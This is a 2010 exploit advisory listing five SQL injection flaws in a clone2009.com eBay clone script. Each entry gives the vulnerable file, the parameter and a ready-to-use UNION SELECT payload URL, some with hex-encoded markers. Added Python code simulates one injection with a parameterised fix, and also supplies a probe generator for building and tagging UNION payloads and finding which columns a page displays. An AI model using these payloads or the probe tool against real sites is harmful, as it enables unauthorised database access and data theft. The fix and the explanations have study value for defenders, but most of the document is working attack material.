/*

Name : Ebay Clone from clone2009.com
Site : http://www.clone2009.com/

Author : Hamza ’MizoZ’ N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka , GreyMen :)

*/

# 1st SQL Injection :

File : gotourl.php , Get : id

[HOST]/[PATH]/gotourl.php?id=-1+union+select+version()--

=> You will be redirected to [HOST]/[PATH]/[VERSION]

The script redirects to whatever URL the query returns: the -1 matches no real row, so the UNION row is the only result and the value of version() becomes the redirect target. The UNION carries a single value because the script selects a single column. Note that MySQL only treats -- as a comment when whitespace follows it; if the query errors, append a trailing + (an encoded space).

Demo : http://server/gotourl.php?id=0+union+select+version()--

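As an added example (my code, not the advisory's and not the clone2009 package), here is a small sqlite3 simulation of the gotourl.php pattern described above, beside a hardened form. The table name `links`, the column `url`, the sample rows and the use of `sqlite_version()` in place of MySQL's `version()` are assumptions made for the demo; the real schema is not known.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the real clone2009 schema is not known."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE links (id INTEGER PRIMARY KEY, url TEXT)")
    conn.executemany(
        "INSERT INTO links VALUES (?, ?)",
        [(1, "http://example.org/item/1"), (2, "http://example.org/item/2")],
    )
    return conn


def engine_version() -> str:
    """sqlite's counterpart of MySQL's version(); used to check the leak."""
    return sqlite3.sqlite_version


def redirect_target_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """The pattern the advisory implies: the GET parameter is pasted into the
    query text and the selected url column becomes the redirect destination."""
    sql = "SELECT url FROM links WHERE id=" + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def redirect_target_fixed(conn: sqlite3.Connection, raw_id: str):
    """Hardened form: validate the id as an integer and bind it as a
    parameter, so attacker input never becomes part of the SQL text."""
    try:
        item_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT url FROM links WHERE id=?", (item_id,)).fetchone()
    return row[0] if row else None


def demo(raw_id: str = "-1 union select sqlite_version()--"):
    """Run the same input through both versions. The default is the advisory's
    payload with version() swapped for sqlite_version(); the leading -1
    matches no real row, so the UNION row is the only result and the engine
    version string comes back as the 'redirect target'."""
    conn = make_db()
    return redirect_target_vulnerable(conn, raw_id), redirect_target_fixed(conn, raw_id)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable redirects to:", leaked)  # the sqlite version string
    print("fixed redirects to:", blocked)      # None: the id is rejected
```

The fix is the usual one: a typed parameter and a bound placeholder. Casting alone would already stop this particular payload, but binding also covers the string parameters the advisory does not cover.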
# 2nd SQL Injection :

File : product_desc.php , Get : id

[HOST]/[PATH]/product_desc.php?id=[INJECTION]

Demo : http://server/product_desc.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

=> The query selects 35 columns. The negative id matches no real row, so the page renders the numbers of the UNION row; the column numbers that show up in the output are the ones that can carry a value such as version().

# 3rd SQL Injection :

File : view_items.php , Get : id

[HOST]/[PATH]/view_items.php?id=[INJECTION]

Demo : http://server/view_items.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18--

=> 18 columns, with the marker placed in column 11 (the one the page displays). The 0x literal is MySQL's way of writing a string without any quote character in the URL; it decodes to <font color="red">HERE INJECTION</font>, a visible marker showing where column 11 lands in the page.

# 4th SQL Injection :

File : bidhistory.php , Get : id

[HOST]/[PATH]/bidhistory.php?id=[INJECTION]

Demo : http://server/bidhistory.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

=> 34 columns, same method as product_desc.php.

# 5th SQL Injection :

File : view_feedback.php , Get : id

[HOST]/[PATH]/view_feedback.php?id=[INJECTION]

Demo : http://server/view_feedback.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14,15,16,17,18--

=> 18 columns, marker in column 11 as for view_items.php; the hex literal decodes to <h1>HERE</h1>.

Ebay Clone from clone2009 SQL Injection Vulnerabilities
Hamza ’MizoZ’ N.
01/16/2010
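As an added example (my code, not the advisory's and not the clone2009 package), a small Python helper that builds the UNION SELECT probes used in injections 2 to 5 and decodes their 0x markers back to text. The tagged probe and the constructed SAMPLE_BODY go beyond the page by tagging every column at once so a single response shows which columns are rendered; the tag format <cNc> and the sample HTML are assumptions, and nothing is sent over the network.

```python
import binascii
import re
from typing import List, Optional


def mysql_hex_literal(text: str) -> str:
    """MySQL reads 0x.. as a string literal, so a marker can carry quotes
    and angle brackets without a single quote character in the URL."""
    return "0x" + binascii.hexlify(text.encode()).decode()


def decode_hex_literal(literal: str) -> str:
    """Turn a 0x.. literal, like the ones in the demos, back into text."""
    if not literal.startswith("0x"):
        raise ValueError("not a MySQL hex literal")
    return binascii.unhexlify(literal[2:]).decode()


def union_probe(row_id: int, columns: int,
                marker_col: Optional[int] = None, marker: str = "") -> str:
    """Build the id value used in the demos: a row id that matches nothing,
    UNION SELECT with one number per column, the marker (hex encoded) in one
    column, and a trailing -- comment. Spaces are written as + because the
    value goes into a query string; nothing else is URL-encoded here."""
    values = [str(i) for i in range(1, columns + 1)]
    if marker_col is not None:
        values[marker_col - 1] = mysql_hex_literal(marker)
    return f"{row_id}+union+select+{','.join(values)}--"


def tagged_probe(row_id: int, columns: int) -> str:
    """Generalisation of the one-marker probe: every column gets its own
    tag, so one request reveals all the columns the page renders."""
    values = [mysql_hex_literal(f"<c{i}c>") for i in range(1, columns + 1)]
    return f"{row_id}+union+select+{','.join(values)}--"


def reflected_columns(body: str) -> List[int]:
    """Find the tags from tagged_probe() in a response body, in page order."""
    return [int(m) for m in re.findall(r"<c(\d+)c>", body)]


# Constructed response body, standing in for what view_items.php might
# render for a tagged 18-column probe: here the page shows columns 3 and 11.
SAMPLE_BODY = "<html><td>Seller: <c3c></td><td>Description: <c11c></td></html>"


if __name__ == "__main__":
    # Reproduces the 5th demo's id value exactly.
    print(union_probe(-62, 18, 11, "<h1>HERE</h1>"))
    # What the 3rd demo's marker says.
    print(decode_hex_literal(
        "0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e"))
    print(tagged_probe(-62, 18))
    print(reflected_columns(SAMPLE_BODY))
```

Because the column count must match exactly for UNION to parse, the usual workflow is to grow `columns` until the error disappears, then send the tagged probe once to learn which positions are visible.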